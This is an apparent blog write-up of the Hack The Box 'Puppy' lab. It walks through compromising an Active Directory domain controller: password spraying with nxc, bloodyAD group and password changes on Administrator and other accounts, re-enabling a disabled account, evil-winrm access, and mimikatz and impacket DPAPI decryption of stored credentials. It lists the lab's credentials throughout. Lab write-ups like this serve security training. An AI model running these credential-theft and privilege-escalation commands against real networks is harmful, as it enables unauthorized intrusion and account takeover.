Published on

HTB - Puppy (Medium)

Authors
  • avatar
    Name
    mfkrypt
    Twitter
Description
Table of Contents

NOTE

Given Credentials -> levi.james:KingofAkron2025!

Scanning

❯ nmap -sV -sC -v -Pn 10.10.11.70

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-05 11:25 +08
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:25
Completed Parallel DNS resolution of 1 host. at 11:25, 0.01s elapsed
Initiating Connect Scan at 11:25
Scanning 10.10.11.70 [1000 ports]
Discovered open port 135/tcp on 10.10.11.70
Discovered open port 53/tcp on 10.10.11.70
Discovered open port 139/tcp on 10.10.11.70
Discovered open port 445/tcp on 10.10.11.70
Discovered open port 111/tcp on 10.10.11.70
Discovered open port 636/tcp on 10.10.11.70
Discovered open port 3268/tcp on 10.10.11.70
Discovered open port 3269/tcp on 10.10.11.70
Discovered open port 464/tcp on 10.10.11.70
Discovered open port 3260/tcp on 10.10.11.70
Discovered open port 593/tcp on 10.10.11.70
Discovered open port 2049/tcp on 10.10.11.70
Discovered open port 389/tcp on 10.10.11.70
Discovered open port 88/tcp on 10.10.11.70
Completed Connect Scan at 11:25, 4.55s elapsed (1000 total ports)
Initiating Service scan at 11:25
Scanning 14 services on 10.10.11.70
Completed Service scan at 11:27, 119.33s elapsed (14 services on 1 host)
NSE: Script scanning 10.10.11.70.
Initiating NSE at 11:27
Completed NSE at 11:27, 40.13s elapsed
Initiating NSE at 11:27
Completed NSE at 11:28, 14.97s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Nmap scan report for 10.10.11.70
Host is up (0.023s latency).
Not shown: 986 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-05 10:03:57Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3260/tcp open  iscsi?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-06-05T10:05:52
|_  start_date: N/A
|_clock-skew: 6h38m38s

NSE: Script Post-scanning.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.38 seconds

Scanning shows we are dealing with AD. Like always, let's start enumerating SMB with the given credentials

Enumerating

❯ nxc smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --shares
❯ nxc smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --users
Description

We can see a few users there, write them down in a file called users.txt, we don't have any permission to any of the non-default share.

Bloodhound

With credentials given, we can gain situational awareness by gathering Bloodhound data.

❯ nxc ldap 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --dns-server 10.10.11.70 --bloodhound --collection All
Description
Description

Observe levi.james has GenericWrite ACE over the Developers group, we can add him into the group.

❯ bloodyAD --host "puppy.htb" -u "levi.james" -p 'KingofAkron2025!' add groupMember "Developers" "levi.james"
Description

Now we-renumerate

Enumerating part 2

Description

levi.james now has READ access to the DEV share.

Description

Connecting to the share, reveals a Keepass Database file. This can easily be bruteforced using an updated tool of keepass2john

Description

Password found. The database itself reveals the credentials of the available users. Save them in a file called passwords.txt

Description

Spray and Pray

❯ nxc smb 10.10.11.70 -u users.txt -p passwords.txt --shares --continue-on-success
Description

We have a hit on ant.edwards:Antman2025!

Continue to enumerate

Description

we have WRITE access now, but that won't help much. Proceed analysing Bloodhound on the new user

Description

Observe that ant.edwards is a member of the Senior Devs group which has GenericAll ACE over adam.silver. With this ACE, we can easily change the target's password

❯ bloodyAD --host "puppy.htb" -u "ant.edwards" -p 'Antman2025!' set password 'adam.silver' 'Password123!'
Description

Gaining Access

adam.silver is also a part of the WinRM group, we should be able to remotely access his account

Description

But, there was a problem. I couldn't evil-winrm into his account for some reason. Then I tried enumerating for shares to verify the password change and the STATUS_ACCOUNT_DISABLED error came up. Apparently, we have to activate his account first.

Description

TIP

https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad#bkmrk-enable-a-disabled-ac

Now we enable it

❯ bloodyAD --host "puppy.htb" -u "ant.edwards" -p 'Antman2025!' remove uac adam.silver -f ACCOUNTDISABLE
Description

Now, we access his account and get the user flag

❯ evil-winrm -i 10.10.11.70 -u adam.silver -p Password123!
Description

Privilege Escalation

Running whoami /priv does not provide anything useful. I proceeded to upload winpeas.exe

Description

There's an unusual hidden file in the Desktop folder

Description

Looking throught the Winpeas results show that the hidden file has something to do with Data Protection API (DPAPI) which is an API that provides a method for symmetric encryption of data

Description

According to this Hacktricks page, we should be looking for any available master keys in which there is only 1 present at the moment:

TIP

Check for master keys here:

Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
Description

Next, we need to find encrypted blobs which are encrypted data files which sometimes contain sensitive information

TIP

Common users files protected are in:

C:\Users\username\AppData\Roaming\Microsoft\Protect\*
C:\Users\username\AppData\Roaming\Microsoft\Credentials\*
C:\Users\username\AppData\Roaming\Microsoft\Vault\*

Check also changing \Roaming\ to \Local\ in the above paths.
Description

Now that we have the master key and the encrypted blob, we will utilize Mimikatz to decrypt the master key first

PS C:\Users\adam.silver\Documents> ./mimikatz.exe "dpapi::masterkey /in:C:\Users\adam.silver\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1105\1038bdea-4935-41a8-a224-9b3720193c86 /sid:S-1-5-21-1487982659-1829050783-2281216199-1105 /password:Password123!" exit

Unfortunately, that didn't work :(

Description

But that will be informational for later, in the C: drive there is a Backups directory. In it, a file called site-backup-2024-12-30.zip. After downloading it, we can see the source code of some webpage

Description

Nothing stands out except some harded-coded credentials in the .bak file

Description

steph.cooper:ChefSteph2025!

We can Winrm into his account. Proceed to upload winpeas.exe

❯ evil-winrm -i 10.10.11.70 -u steph.cooper -p ChefSteph2025!
Description

At the same DPAPI section, there were noticable information

Description

Initially in adam.silver's account there was 1 encrypted blob, but this time there's 2. One of them having the description, "Enterprise Credential Data". Also the other blob was the same as adam.silver's. Possible shared data? maybe this time we can decrypt the master key using steph.cooper's account as the master key is also present here.

1'st blob: DFBE70A7E5CC19A398EBF1B96859CE5D
2'nd blob: 1C8D69EBE9A43E9DEBF6B5FBD48B521B9

PS C:\Users\steph.cooper\Documents> ./mimikatz.exe "dpapi::masterkey /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107/556a2412-1275-4ccf-b721-e6a0b4f90407 /sid:S-1-5-21-1487982659-1829050783-2281216199-1107 /passw
ord:ChefSteph2025! /protected" exit
Description

Nice, we have decrypted the masterkey. Now, we can decrypt the encrypted blobs using the master key! I decrypted the first blob.

PS C:\Users\steph.cooper\Documents> ./mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" exit

We get a long output which isn't helpful. Continue decrypting the 2'nd blob.

PS C:\Users\steph.cooper\Documents> ./mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" exit

We get some juicy info

Description

steph.cooper_adm:FivethChipOnItsWay2025!

Then, I went back to Bloodhound to check permissions because I saw something interesting.

Description

We have all these fun ACEs to play with but I just went for password change because I was a bit tired

❯ bloodyAD --host "puppy.htb" -u "steph.cooper_adm" -p 'FivethChipOnItsWay2025!' set password 'Administrator' 'Password123!'
Description

Finally just Winrm inside and get da root flag

Description

Alternative

I found another cool way to crack the Master Key and the encrypted blob. It's essentially the same method, but using the Impacket's dpapi tool, but to use that we needed to transfer the master key and blob and using evil-winrm's download command does not work well. Instead transfer them from the target machine by starting an SMB share server, then run these commands

❯ impacket-dpapi masterkey -file 1038bdea-4935-41a8-a224-9b3720193c86 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password ChefSteph2025!
Description

Then decrypt the blob

❯ impacket-dpapi credential -file C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Description